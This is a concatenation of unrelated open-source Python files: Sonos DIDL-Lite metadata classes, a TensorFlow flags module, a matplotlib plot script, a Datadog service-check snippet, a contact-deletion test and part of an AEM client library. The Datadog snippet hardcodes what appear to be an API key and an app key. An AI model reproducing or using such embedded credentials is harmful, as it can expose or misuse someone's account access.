def __new__(mcs, name, bases, attrs):
"""Create a new instance.
Args:
name: Name of the class
bases: Base classes (tuple)
attrs: Attributes defined for the class
"""
new_cls = super(DidlMetaClass, mcs).__new__(mcs, name, bases, attrs)
# Register all subclasses with the global _DIDL_CLASS_TO_CLASS mapping
item_class = attrs.get('item_class', None)
if item_class is not None:
_DIDL_CLASS_TO_CLASS[item_class] = new_cls
return new_cls
# Py2/3 compatible way of declaring the metaclass
class DidlObject(DidlMetaClass(str('DidlMetaClass'), (object,), {})):
"""Abstract base class for all DIDL-Lite items.
You should not need to instantiate this.
Attributes:
item_class (str): The DIDL Lite class for this object
tag (str): The XML element tag name used for this instance
_translation (dict): A dict used to translate between instance
attribute names and XML tags/namespaces. It also serves to define
the allowed tags/attributes for this instance. Overridden and
extended by subclasses.
"""
item_class = 'object'
tag = 'item'
# key: attribute_name: (ns, tag)
_translation = {
'creator': ('dc', 'creator'),
'write_status': ('upnp', 'writeStatus'),
}
def __init__(self, title, parent_id, item_id, restricted=True,
resources=None, desc='RINCON_AssociatedZPUDN', **kwargs):
r"""Construct and initialize a DidlObject.
Args:
title (str): The title for the item
parent_id (str): The parent ID for the item
item_id (str): The ID for the item
restricted (bool): Whether the item can be modified
resources (list): A list of resources for this object
desc (str): A didl descriptor, default RINCON_AssociatedZPUDN. This
is not the same as "description"! It is used for identifying
the relevant music service
**kwargs: Extra metadata. What is allowed depends on the
_translation class attribute, which in turn depends on the DIDL
class
"""
# All didl objects *must* have a title, a parent_id and an item_id
# so we specify these as required args in the constructor signature
# to ensure that we get them. Other didl object properties are
# optional, so can be passed as kwargs.
# The content of _translation is adapted from the list in table C at
# http://upnp.org/specs/av/UPnP-av-ContentDirectory-v2-Service.pdf
# Not all properties referred to there are catered for, since Sonos
# does not use some of them.
# pylint: disable=super-on-old-class
super(DidlObject, self).__init__()
self.title = title
self.parent_id = parent_id
self.item_id = item_id
# Restricted is a compulsory attribute, but is almost always True for
# Sonos. (Only seen it 'false' when browsing favorites)
self.restricted = restricted
# Resources is multi-valued, and dealt with separately
self.resources = [] if resources is None else resources
# According to the spec, there may be one or more desc values. Sonos
# only seems to use one, so we won't bother with a list
self.desc = desc
for key, value in kwargs.items():
# For each attribute, check to see if this class allows it
if key not in self._translation:
raise ValueError(
'The key \'{0}\' is not allowed as an argument. Only '
'these keys are allowed: parent_id, item_id, title, '
'restricted, resources, desc'
' {1}'.format(key, ', '.join(self._translation.keys())))
# It is an allowed attribute. Set it as an attribute on self, so
# that it can be accessed as Classname.attribute in the normal
# way.
setattr(self, key, value)
@classmethod
def from_element(cls, element):
"""Create an instance of this class from an ElementTree xml Element.
An alternative constructor. The element must be a DIDL-Lite <item> or
<container> element, and must be properly namespaced.
Arg:
xml (Element): An :py:class:`xml.etree.ElementTree.Element` object.
"""
# Check we have the right sort of element. tag can be an empty string
# which indicates that any tag is allowed (see eg the musicAlbum DIDL
# class)
if not element.tag.endswith(cls.tag):
raise DIDLMetadataError(
"Wrong element. Expected '<{0}>',"
" got '<{1}>'".format(cls.tag, element.tag))
# and that the upnp matches what we are expecting
item_class = element.find(ns_tag('upnp', 'class')).text
if item_class != cls.item_class:
raise DIDLMetadataError(
"UPnP class is incorrect. Expected '{0}',"
" got '{1}'".format(cls.item_class, item_class))
# parent_id, item_id and restricted are stored as attibutes on the
# element
item_id = really_unicode(element.get('id', None))
if item_id is None:
raise DIDLMetadataError("Missing id attribute")
parent_id = really_unicode(element.get('parentID', None))
if parent_id is None:
raise DIDLMetadataError("Missing parentID attribute")
restricted = element.get('restricted', None)
if restricted is None:
raise DIDLMetadataError("Missing restricted attribute")
restricted = True if restricted in [1, 'true', 'True'] else False
# There must be a title. According to spec, it should be the first
# child, but Sonos does not abide by this
title_elt = element.find(ns_tag('dc', 'title'))
if title_elt is None:
raise DIDLMetadataError(
"Missing title element")
title = really_unicode(title_elt.text)
# Deal with any resource elements
resources = []
for res_elt in element.findall(ns_tag('', 'res')):
resources.append(
DidlResource.from_element(res_elt))
# and the desc element (There is only one in Sonos)
desc = element.findtext(ns_tag('', 'desc'))
# Get values of the elements listed in _translation and add them to
# the content dict
content = {}
for key, value in cls._translation.items():
result = element.findtext(ns_tag(*value))
if result is not None:
# We store info as unicode internally.
content[key] = really_unicode(result)
# Convert type for original track number
if content.get('original_track_number') is not None:
content['original_track_number'] = \
int(content['original_track_number'])
# Now pass the content dict we have just built to the main
# constructor, as kwargs, to create the object
return cls(title=title, parent_id=parent_id, item_id=item_id,
restricted=restricted, resources=resources, desc=desc,
**content)
@classmethod
def from_dict(cls, content):
"""Create an instance from a dict.
An alternative constructor. Equivalent to DidlObject(**content).
Arg:
content (dict): Dict containing metadata information.Required and
valid arguments are the same as for the ``__init__`` method.
"""
# Do we really need this constructor? Could use DidlObject(**content)
# instead.
return cls(**content)
def __eq__(self, playable_item):
"""Compare with another ``playable_item``.
Returns:
(bool): True if items are equal, else False
"""
if not isinstance(playable_item, DidlObject):
return False
return self.to_dict() == playable_item.to_dict()
def __ne__(self, playable_item):
"""Compare with another ``playable_item``.
Returns:
(bool): True if items are unequal, else False
"""
if not isinstance(playable_item, DidlObject):
return True
return self.to_dict() != playable_item.to_dict()
def __repr__(self):
"""Return the repr value for the item.
The repr is of the form::
<class_name 'middle_part[0:40]' at id_in_hex>
where middle_part is either the title item in content, if it is set,
or ``str(content)``. The output is also cleared of non-ascii
characters.
"""
# 40 originates from terminal width (78) - (15) for address part and
# (19) for the longest class name and a little left for buffer
if self.title is not None:
middle = self.title.encode('ascii', 'replace')[0:40]
else:
middle = str(self.to_dict).encode('ascii', 'replace')[0:40]
return '<{0} \'{1}\' at {2}>'.format(self.__class__.__name__,
middle,
hex(id(self)))
def __str__(self):
"""Return the str value for the item::
<class_name 'middle_part[0:40]' at id_in_hex>
where middle_part is either the title item in content, if it is set, or
``str(content)``. The output is also cleared of non-ascii characters.
"""
return self.__repr__()
def to_dict(self):
"""Return the dict representation of the instance."""
content = {}
# Get the value of each attribute listed in _translation, and add it
# to the content dict
for key in self._translation:
if hasattr(self, key):
content[key] = getattr(self, key)
# also add parent_id, item_id, restricted, title and resources because
# they are not listed in _translation
content['parent_id'] = self.parent_id
content['item_id'] = self.item_id
content['restricted'] = self.restricted
content['title'] = self.title
if self.resources != []:
content['resources'] = self.resources
content['desc'] = self.desc
return content
def to_element(self, include_namespaces=False):
"""Return an ElementTree Element representing this instance.
Arg:
include_namespaces (bool, optional): If True, include xml
namespace attributes on the root element
Return:
An ElementTree Element
.. code :: xml
<DIDL-Lite ..NS_INFO..>
<item id="...self.item_id..."
parentID="...cls.parent_id..." restricted="true">
<dc:title>...self.title...</dc:title>
<upnp:class>...self.item_class...</upnp:class>
<desc id="cdudn"
nameSpace="urn:schemas-rinconnetworks-com:metadata-1-0/">
RINCON_AssociatedZPUDN
</desc>
</item>
</DIDL-Lite>
"""
elt_attrib = {}
if include_namespaces:
elt_attrib.update({
'xmlns': "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
'xmlns:dc': "http://purl.org/dc/elements/1.1/",
'xmlns:upnp': "urn:schemas-upnp-org:metadata-1-0/upnp/",
})
elt_attrib.update({
'parentID': self.parent_id,
'restricted': 'true' if self.restricted else 'false',
'id': self.item_id
})
elt = XML.Element(self.tag, elt_attrib)
# Add the title, which should always come first, according to the spec
XML.SubElement(elt, 'dc:title').text = self.title
# Add in any resources
for resource in self.resources:
elt.append(resource.to_element())
# Add the rest of the metadata attributes (i.e all those listed in
# _translation) as sub-elements of the item element.
for key, value in self._translation.items():
if hasattr(self, key):
# Some attributes have a namespace of '', which means they
# are in the default namespace. We need to handle those
# carefully
tag = "%s:%s" % value if value[0] else "%s" % value[1]
XML.SubElement(elt, tag).text = ("%s" % getattr(self, key))
# Now add in the item class
XML.SubElement(elt, 'upnp:class').text = self.item_class
# And the desc element
desc_attrib = {'id': 'cdudn', 'nameSpace':
'urn:schemas-rinconnetworks-com:metadata-1-0/'}
desc_elt = XML.SubElement(elt, 'desc', desc_attrib)
desc_elt.text = self.desc
return elt
###############################################################################
# OBJECT.ITEM HIERARCHY #
###############################################################################
class DidlItem(DidlObject):
"""A basic content directory item."""
# The spec allows for an option 'refID' attribute, but we do not handle it
item_class = 'object.item'
# _translation = DidlObject._translation.update({ ...})
# does not work, but doing it in two steps does
_translation = DidlObject._translation.copy()
_translation.update(
{
'stream_content': ('r', 'streamContent'),
'radio_show': ('r', 'radioShowMd'),
'album_art_uri': ('upnp', 'albumArtURI'),
}
)
class DidlAudioItem(DidlItem):
"""An audio item."""
item_class = 'object.item.audioitem'
_translation = DidlItem._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'description': ('dc', 'description'),
'long_description': ('upnp', 'longDescription'),
'publisher': ('dc', 'publisher'),
'language': ('dc', 'language'),
'relation': ('dc', 'relation'),
'rights': ('dc', 'rights'),
}
)
# Browsing Sonos Favorites produces some odd looking DIDL-Lite. The object
# class is 'object.itemobject.item.sonos-favorite', which is probably a typo
# in Sonos' code somewhere.
# Here is an example:
# <?xml version="1.0" ?>
# <DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
# xmlns:dc="http://purl.org/dc/elements/1.1/"
# xmlns:r="urn:schemas-rinconnetworks-com:metadata-1-0/"
# xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/">
# <item id="FV:2/13" parentID="FV:2" restricted="false">
# <dc:title>Shake It Off</dc:title>
# <upnp:class>object.itemobject.item.sonos-favorite</upnp:class>
# <r:ordinal>4</r:ordinal>
# <res protocolInfo="sonos.com-spotify:*:audio/x-spotify:*">
# x-sonos-spotify:spotify%3atrack%3a7n.......?sid=9&flags=32</res>
# <upnp:albumArtURI>http://o.scd.....</upnp:albumArtURI>
# <r:type>instantPlay</r:type>
# <r:description>By Taylor Swift</r:description>
# <r:resMD><DIDL-Lite xmlns:dc="
# http://purl.org/dc/elements/1.1/"
# xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
# xmlns:r="urn:schemas-rinconnetworks-com:metadata-1-0/"
# xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/">
# <item id="00030020spotify%3atrack%3a7n9Q6b...74uCtajkddPt"
# parentID="0006006ctoplist%2ftracks%2fregion%2fGB"
# restricted="true"><dc:title>Shake It Off
# </dc:title><upnp:class>object.item.audioItem.musicTrack
# </upnp:class><desc id="cdudn"
# nameSpace="urn:schemas-rinconnetworks-com:metadata-1-0/">
# SA_RINCON2311_XXXXX</desc>
# </item>
# </DIDL-Lite>
# </r:resMD>
# </item>
# </DIDL-Lite>
# Note the r:ordinal, r:type; r:description, r:resMD elements which are not
# seen (?) anywhere else
# We're ignoring this for the moment!
class DidlMusicTrack(DidlAudioItem):
"""Class that represents a music library track. """
item_class = 'object.item.audioItem.musicTrack'
# name: (ns, tag)
_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'album': ('upnp', 'album'),
'original_track_number': ('upnp', 'originalTrackNumber'),
'playlist': ('upnp', 'playlist'),
'contributor': ('dc', 'contributor'),
'date': ('dc', 'date'),
}
)
class DidlAudioBroadcast(DidlAudioItem):
"""Class that represents an audio broadcast."""
item_class = 'object.item.audioItem.audioBroadcast'
_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'region': ('upnp', 'region'),
'radio_call_sign': ('upnp', 'radioCallSign'),
'radio_station_id': ('upnp', 'radioStationID'),
'channel_nr': ('upnp', 'channelNr'),
}
)
class DidlAudioBroadcastFavorite(DidlAudioBroadcast):
"""Class that represents an audio broadcast sonos favorite."""
# Note: The sonos-favorite part of the class spec obviously isn't part of
# the DIDL spec, so just assume that it has the same definition as the
# regular object.item.audioItem.audioBroadcast
item_class = 'object.item.audioItem.audioBroadcast.sonos-favorite'
###############################################################################
# OBJECT.CONTAINER HIERARCHY #
###############################################################################
class DidlContainer(DidlObject):
"""Class that represents a music library container. """
item_class = 'object.container'
tag = 'container'
# We do not implement createClass or searchClass. Not used by Sonos??
# TODO: handle the 'childCount' element.
class DidlAlbum(DidlContainer):
"""A content directory album."""
item_class = 'object.container.album'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'description': ('dc', 'description'),
'long_description': ('upnp', 'longDescription'),
'publisher': ('dc', 'publisher'),
'contributor': ('dc', 'contributor'),
'date': ('dc', 'date'),
'relation': ('dc', 'relation'),
'rights': ('dc', 'rights'),
}
)
class DidlMusicAlbum(DidlAlbum):
"""Class that represents a music library album. """
item_class = 'object.container.album.musicAlbum'
# According to the spec, all musicAlbums should be represented in
# XML by a <container> tag. Sonos sometimes uses <container> and
# sometimes uses <item>. Set the tag type to '' to indicate that
# either is allowed.
tag = ''
# name: (ns, tag)
# pylint: disable=protected-access
_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'genre': ('upnp', 'genre'),
'producer': ('upnp', 'producer'),
'toc': ('upnp', 'toc'),
'album_art_uri': ('upnp', 'albumArtURI'),
}
)
class DidlMusicAlbumFavorite(DidlAlbum):
"""Class that represents a Sonos favorite music library album.
This class is not part of the DIDL spec and is Sonos specific.
"""
item_class = 'object.container.album.musicAlbum.sonos-favorite'
# Despite the fact that the item derives from object.container, it's
# XML does not include a <container> tag, but an <item> tag. This seems
# to be an error by Sonos.
tag = 'item'
class DidlMusicAlbumCompilation(DidlAlbum):
"""Class that represents a Sonos favorite music library compilation.
This class is not part of the DIDL spec and is Sonos specific.
"""
# These classes appear when browsing the library and Sonos has been set
# to group albums using compilations.
# See https://github.com/SoCo/SoCo/issues/280
item_class = 'object.container.album.musicAlbum.compilation'
tag = 'container'
class DidlPerson(DidlContainer):
"""A content directory class representing a person."""
item_class = 'object.container.person'
_translation = DidlContainer._translation.copy()
_translation.update(
{
'language': ('dc', 'language'),
}
)
class DidlComposer(DidlPerson):
"""Class that represents a music library composer."""
# Not in the DIDL-Lite spec. Sonos specific??
item_class = 'object.container.person.composer'
class DidlMusicArtist(DidlPerson):
"""Class that represents a music library artist."""
item_class = 'object.container.person.musicArtist'
# name: (ns, tag)
_translation = DidlPerson._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'artist_discography_uri': ('upnp', 'artistDiscographyURI'),
}
)
class DidlAlbumList(DidlContainer):
"""Class that represents a music library album list."""
# This does not appear (that I can find) in the DIDL-Lite specs.
# Presumably Sonos specific
item_class = 'object.container.albumlist'
class DidlPlaylistContainer(DidlContainer):
"""Class that represents a music library play list."""
item_class = 'object.container.playlistContainer'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'genre': ('upnp', 'genre'),
'long_description': ('upnp', 'longDescription'),
'producer': ('dc', 'producer'),
'contributor': ('dc', 'contributor'),
'description': ('dc', 'description'),
'date': ('dc', 'date'),
'language': ('dc', 'language'),
'rights': ('dc', 'rights'),
}
)
class DidlSameArtist(DidlPlaylistContainer):
"""Class that represents all tracks by a single artist.
This type is returned by browsing an artist or a composer
"""
# Not in the DIDL-Lite spec. Sonos specific?
item_class = 'object.container.playlistContainer.sameArtist'
class DidlGenre(DidlContainer):
"""A content directory class representing a general genre."""
item_class = 'object.container.genre'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'long_description': ('upnp', 'longDescription'),
'description': ('dc', 'description'),
}
)
class DidlMusicGenre(DidlGenre):
"""Class that represents a music genre."""
item_class = 'object.container.genre.musicGenre'
###############################################################################
# SPECIAL LISTS #
###############################################################################
class ListOfMusicInfoItems(list):
"""Abstract container class for a list of music information items."""
def __init__(self, items, number_returned, total_matches, update_id):
super(ListOfMusicInfoItems, self).__init__(items)
self._metadata = {
'item_list': list(items),
'number_returned': number_returned,
'total_matches': total_matches,
'update_id': update_id,
}
def __getitem__(self, key):
"""Legacy get metadata by string key or list item(s) by index.
DEPRECATION: This overriding form of __getitem__ will be removed in
the 3rd release after 0.8. The metadata can be fetched via the named
attributes
"""
if key in self._metadata:
if key == 'item_list':
message = """
Calling [\'item_list\'] on search results to obtain the objects
is no longer necessary, since the object returned from searches
now is a list. This deprecated way of getting the items will
be removed from the third release after 0.8."""
else:
message = """
Getting metadata items by indexing the search result like a
dictionary [\'{0}\'] is deprecated. Please use the named
attribute {1}.{0} instead. The deprecated way of retrieving the
metadata will be removed from the third release after
0.8""".format(key, self.__class__.__name__)
message = textwrap.dedent(message).replace('\n', ' ').lstrip()
warnings.warn(message, DeprecationWarning, stacklevel=2)
return self._metadata[key]
else:
return super(ListOfMusicInfoItems, self).__getitem__(key)
@property
def number_returned(self):
"""The number of returned matches."""
return self._metadata['number_returned']
@property
def total_matches(self):
"""The number of total matches."""
return self._metadata['total_matches']
@property
def update_id(self):
"""The update ID."""
return self._metadata['update_id']
class SearchResult(ListOfMusicInfoItems):
"""Container class that represents a search or browse result.
(browse is just a special case of search)
"""
def __init__(self, items, search_type, number_returned,
total_matches, update_id):
super(SearchResult, self).__init__(
items, number_returned, total_matches, update_id
)
self._metadata['search_type'] = search_type
def __repr__(self):
return '{0}(items={1}, search_type=\'{2}\')'.format(
self.__class__.__name__,
super(SearchResult, self).__repr__(),
self.search_type)
@property
def search_type(self):
"""The search type."""
return self._metadata['search_type']
class Queue(ListOfMusicInfoItems):
"""Container class that represents a queue."""
def __init__(self, items, number_returned, total_matches, update_id):
super(Queue, self).__init__(
items, number_returned, total_matches, update_id
)
def __repr__(self):
return '{0}(items={1})'.format(
self.__class__.__name__,
super(Queue, self).__repr__(),
)
|
{
"content_hash": "202d24161b6b59a48069eeaee79e4f07",
"timestamp": "",
"source": "github",
"line_count": 989,
"max_line_length": 81,
"avg_line_length": 36.68655207280081,
"alnum_prop": 0.5726648843811151,
"repo_name": "bwhaley/SoCo",
"id": "2d5b7b7e0320d4a82368071b60b4488b8990a38b",
"size": "36364",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "soco/data_structures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "168"
},
{
"name": "CSS",
"bytes": "571"
},
{
"name": "HTML",
"bytes": "4055"
},
{
"name": "Makefile",
"bytes": "66"
},
{
"name": "Python",
"bytes": "398195"
},
{
"name": "Shell",
"bytes": "342"
}
],
"symlink_target": ""
}
|
"""Implementation of the flags interface."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
_global_parser = argparse.ArgumentParser()
class _FlagValues(object):
def __init__(self):
"""Global container and accessor for flags and their values."""
self.__dict__['__flags'] = {}
self.__dict__['__parsed'] = False
def _parse_flags(self):
result, _ = _global_parser.parse_known_args()
for flag_name, val in vars(result).items():
self.__dict__['__flags'][flag_name] = val
self.__dict__['__parsed'] = True
def __getattr__(self, name):
"""Retrieves the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self._parse_flags()
if name not in self.__dict__['__flags']:
raise AttributeError(name)
return self.__dict__['__flags'][name]
def __setattr__(self, name, value):
"""Sets the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self._parse_flags()
self.__dict__['__flags'][name] = value
def _define_helper(flag_name, default_value, docstring, flagtype):
"""Registers 'flag_name' with 'default_value' and 'docstring'."""
_global_parser.add_argument("--" + flag_name,
default=default_value,
help=docstring,
type=flagtype)
# Provides the global object that can be used to access flags.
FLAGS = _FlagValues()
def DEFINE_string(flag_name, default_value, docstring):
"""Defines a flag of type 'string'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a string.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, str)
def DEFINE_integer(flag_name, default_value, docstring):
"""Defines a flag of type 'int'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as an int.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, int)
def DEFINE_boolean(flag_name, default_value, docstring):
"""Defines a flag of type 'boolean'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a boolean.
docstring: A helpful message explaining the use of the flag.
"""
# Register a custom function for 'bool' so --flag=True works.
def str2bool(v):
return v.lower() in ('true', 't', '1')
_global_parser.add_argument('--' + flag_name,
nargs='?',
const=True,
help=docstring,
default=default_value,
type=str2bool)
# Add negated version, stay consistent with argparse with regard to
# dashes in flag names.
_global_parser.add_argument('--no' + flag_name,
action='store_false',
dest=flag_name.replace('-', '_'))
# The internal google library defines the following alias, so we match
# the API for consistency.
DEFINE_bool = DEFINE_boolean # pylint: disable=invalid-name
def DEFINE_float(flag_name, default_value, docstring):
"""Defines a flag of type 'float'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a float.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, float)
|
{
"content_hash": "f7319323c74c85bd205ed26024bef810",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 71,
"avg_line_length": 33.60909090909091,
"alnum_prop": 0.6205031106302408,
"repo_name": "Lab603/PicEncyclopedias",
"id": "85f9e2cb860d02166e2171e1cebd9e5ebccfc25b",
"size": "4387",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "jni-build/jni-build/jni/include/tensorflow/python/platform/flags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "361482"
},
{
"name": "C++",
"bytes": "22994090"
},
{
"name": "CMake",
"bytes": "72924"
},
{
"name": "CSS",
"bytes": "1548"
},
{
"name": "HTML",
"bytes": "1040352"
},
{
"name": "Java",
"bytes": "252082"
},
{
"name": "JavaScript",
"bytes": "25902"
},
{
"name": "Jupyter Notebook",
"bytes": "3547008"
},
{
"name": "Makefile",
"bytes": "47206"
},
{
"name": "Objective-C",
"bytes": "10664"
},
{
"name": "Objective-C++",
"bytes": "91354"
},
{
"name": "Python",
"bytes": "19063444"
},
{
"name": "Shell",
"bytes": "476334"
},
{
"name": "TypeScript",
"bytes": "1264488"
}
],
"symlink_target": ""
}
|
import matplotlib.pyplot as plt
import seaborn as sb
import pandas as pd
P_letter_lang = pd.read_csv('table_langs.dat', sep=' ', header=0, index_col = 0)
plt.plot(range(26), pd.np.array(P_letter_lang["eng"]), '-')
plt.plot(range(26), pd.np.array(P_letter_lang["fre"]), '-')
plt.plot(range(26), pd.np.array(P_letter_lang["ger"]), '-')
plt.plot(range(26), pd.np.array(P_letter_lang["ita"]), '-')
plt.plot(range(26), pd.np.array(P_letter_lang["spa"]), '-')
plt.xticks(list(range(26)), P_letter_lang.index)
plt.legend(["English", "French", "German", "Italian", "Spanish"])
plt.xlabel("letter")
plt.ylabel("P(letter)")
plt.savefig("letter_lang.png")
|
{
"content_hash": "2d9a224769c11b1e98ba0b83e77302b7",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 80,
"avg_line_length": 40.375,
"alnum_prop": 0.6640866873065016,
"repo_name": "bmtgoncalves/IFISC2017",
"id": "aa605ca741b88d9abda74286d6dc647bc10495a0",
"size": "670",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plot_langs.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "18895"
}
],
"symlink_target": ""
}
|
from datadog import initialize, api
from datadog.api.constants import CheckStatus
options = {
'api_key': '9775a026f1ca7d1c6c5af9d94d9595a4',
'app_key': '87ce4a24b5553d2e482ea8a8500e71b8ad4554ff'
}
initialize(**options)
check = 'app.ok'
host = 'app1'
status = CheckStatus.OK
api.ServiceCheck.check(check=check, host_name=host, status=status, message='Response: 200 OK')
|
{
"content_hash": "e31349d6af45d3bcb82891fe4244e6c3",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 94,
"avg_line_length": 25.4,
"alnum_prop": 0.7585301837270341,
"repo_name": "inokappa/documentation",
"id": "cac35d7a6fbef3251cf32ade791029b097854cb4",
"size": "381",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "code_snippets/api-checks-post.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "13150"
},
{
"name": "HTML",
"bytes": "301722"
},
{
"name": "JavaScript",
"bytes": "26084"
},
{
"name": "Python",
"bytes": "33938"
},
{
"name": "Ruby",
"bytes": "46212"
},
{
"name": "Shell",
"bytes": "41155"
}
],
"symlink_target": ""
}
|
from model.contact import Contact
import random
def test_delete_first_contact(app, db, check_ui): # add a fixture app as a parameter
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(firstname="Ivan"))
old_contacts = db.get_contact_list()
contact = random.choice(old_contacts)
app.contact.delete_contact_by_id(contact.id)
assert len(old_contacts) - 1 == app.contact.count()
new_contacts = db.get_contact_list()
old_contacts.remove(contact)
assert old_contacts == new_contacts
if check_ui: # only do assertion when --check_ui option exists (it was added as a fixture to conftest.py)
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
|
{
"content_hash": "e650c7cdfac327c83a677031c5944f70",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 123,
"avg_line_length": 47.9375,
"alnum_prop": 0.6988265971316818,
"repo_name": "Lana-Pa/Python-training",
"id": "25d235938921ef306c760008407fae28eadd4554",
"size": "767",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_delete_contact.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46047"
}
],
"symlink_target": ""
}
|
from . import bagofrequests as bag
from BeautifulSoup import BeautifulSoup
from . import handlers
import re
from . import result as res
HEX_MASSAGE = [(re.compile('&#x([^;]+);'), lambda m: '&#%d;' % int(m.group(1), 16))]
class ContentRepo(object):
def __init__(self, url, **kwargs):
self.url = url
self.kwargs = kwargs
self.handlers = {
401: handlers.auth_fail,
405: handlers.method_not_allowed
}
def create_path(self, path, **kwargs):
def _handler_exist(response, **kwargs):
message = 'Path {0} already exists'.format(path)
result = res.PyAemResult(response)
result.warning(message)
return result
def _handler_ok(response, **kwargs):
message = 'Path {0} created'.format(path)
result = res.PyAemResult(response)
result.success(message)
return result
_handlers = {
200: _handler_exist,
201: _handler_ok
}
method = 'post'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def delete_path(self, path, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Path {0} deleted'.format(path)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = 'Path {0} not found'.format(path)
result = res.PyAemResult(response)
result.warning(message)
return result
_handlers = {
204: _handler_ok,
404: _handler_not_found
}
method = 'delete'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def activate_path(self, path, **kwargs):
def _handler_ok(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
errors = soup.findAll(attrs={'class': 'error'})
result = res.PyAemResult(response)
if len(errors) == 0:
message = 'Path {0} activated'.format(path)
result.success(message)
else:
message = errors[0].string
result.failure(message)
return result
params = {
'cmd': 'activate',
'path': path
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/etc/replication/treeactivation.html'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def does_user_exist(self, user_path, user_name, **kwargs):
node_path = '{0}/{1}'.format(user_path.rstrip('/'), user_name.lstrip('/'))
return self._does_node_exist(node_path, 'User', **kwargs)
def create_user(self, user_path, user_name, password, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0}/{1} created'.format(user_path.rstrip('/'), user_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_exist_or_error(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
if message_elem != None:
message = message_elem.contents[0]
exist_message = ('org.apache.jackrabbit.api.security.user.AuthorizableExistsException: ' +
'User or Group for \'{0}\' already exists'.format(user_name))
result = res.PyAemResult(response)
if message == exist_message:
result.warning('User {0}/{1} already exists'.format(user_path.rstrip('/'), user_name))
else:
result.failure(message)
return result
params = {
'createUser': '',
'authorizableId': user_name,
'rep:password': password,
'intermediatePath': user_path
}
_handlers = {
201: _handler_ok,
500: _handler_exist_or_error
}
method = 'post'
url = '{0}/libs/granite/security/post/authorizables'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def add_user_to_group(self, user_name, group_path, group_name, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0} added to group {1}/{2}'.format(user_name, group_path.rstrip('/'), group_name)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
'addMembers': user_name
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/{1}/{2}.rw.html'.format(self.url, group_path.strip('/'), group_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def does_group_exist(self, group_path, group_name, **kwargs):
node_path = '{0}/{1}'.format(group_path.rstrip('/'), group_name.lstrip('/'))
return self._does_node_exist(node_path, 'Group', **kwargs)
def create_group(self, group_path, group_name, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Group {0}/{1} created'.format(group_path.rstrip('/'), group_name)
